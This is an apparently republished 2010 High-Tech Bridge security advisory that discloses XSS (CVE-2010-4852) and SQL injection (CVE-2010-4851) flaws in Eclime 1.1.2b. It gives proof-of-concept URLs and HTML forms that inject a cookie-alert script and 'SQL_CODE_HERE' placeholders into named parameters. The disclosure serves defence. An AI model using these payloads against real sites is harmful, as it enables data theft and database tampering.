Lucene search

K
htbridgeHigh-Tech BridgeHTB22704
HistoryNov 16, 2010 - 12:00 a.m.

Multiple Vulnerabilities in Eclime

2010-11-1600:00:00
High-Tech Bridge
www.htbridge.com
23

0.021 Low

EPSS

Percentile

89.2%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Eclime which could be exploited to perform cross-site scripting and SQL injection attacks.

  1. Cross-site scripting (XSS) vulnerability in Eclime: CVE-2010-4852
    The vulnerability exists due to input sanitation error in the “reason” parameter in login.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
    Exploitation example:
    http://[host]/login.php?login=fail&reason=<script>alert(document.cookie);</s cript>

  2. SQL injection vulnerabilities in Eclime: CVE-2010-4851
    2.1 The vulnerability exists due to input sanitation errors in the “country” parameter in create_account.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in applications database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database. Exploitation example: &lt;form action="http://[host]/create_account.php" method="post" name="main" &gt; &lt;input type="hidden" name="action" value="process" id="action" /&gt; &lt;input type="hidden" name="email_address" value="[email protected]" /&gt; &lt;input type="hidden" name="password" value="password" /&gt; &lt;input type="hidden" name="confirmation" value="password" /&gt; &lt;input type="hidden" name="gender" value="m" /&gt; &lt;input type="hidden" name="firstname" value="firstname" /&gt; &lt;input type="hidden" name="lastname" value="lastname" /&gt; &lt;input type="hidden" name="dob_month" value="01" /&gt; &lt;input type="hidden" name="dob_day" value="01" /&gt; &lt;input type="hidden" name="dob_year" value="1987" /&gt; &lt;input type="hidden" name="street_address" value="street_address" /&gt; &lt;input type="hidden" name="city" value="city" /&gt; &lt;input type="hidden" name="state" value="state" /&gt; &lt;input type="hidden" name="postcode" value="1234" /&gt; &lt;input type="hidden" name="phoneAreaCode" value="123" /&gt; &lt;input type="hidden" name="phonePrefix" value="123" /&gt; &lt;input type="hidden" name="phoneNumber" value="123" /&gt; &lt;input type="hidden" name="country" value="'SQL_CODE_HERE" /&gt; &lt;input type="submit" value="submit" name="submit" /&gt; &lt;/form&gt; 2.2 The vulnerability exists due to input sanitation errors in the "ref" parameter in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in applications database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation example:
    http://[host]/?ref=123%27SQL_CODE_HERE
    2.3 The vulnerability exists due to input sanitation errors in the “poll_options_id” and “poll_id” parameters in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation example:
    <form action=“http://[host]/index.php?poll_action=vote” method=“post”>
    <input name=“poll_options_id” value="1’SQL_CODE_HERE " type=“hidden”>
    <input name=“poll_id” type=“hidden” value=“1’SQL_CODE_HERE” >
    <input type=“submit” value=“submit” name=“submit” />
    </form>

CPENameOperatorVersion
eclimele1.1.2b

0.021 Low

EPSS

Percentile

89.2%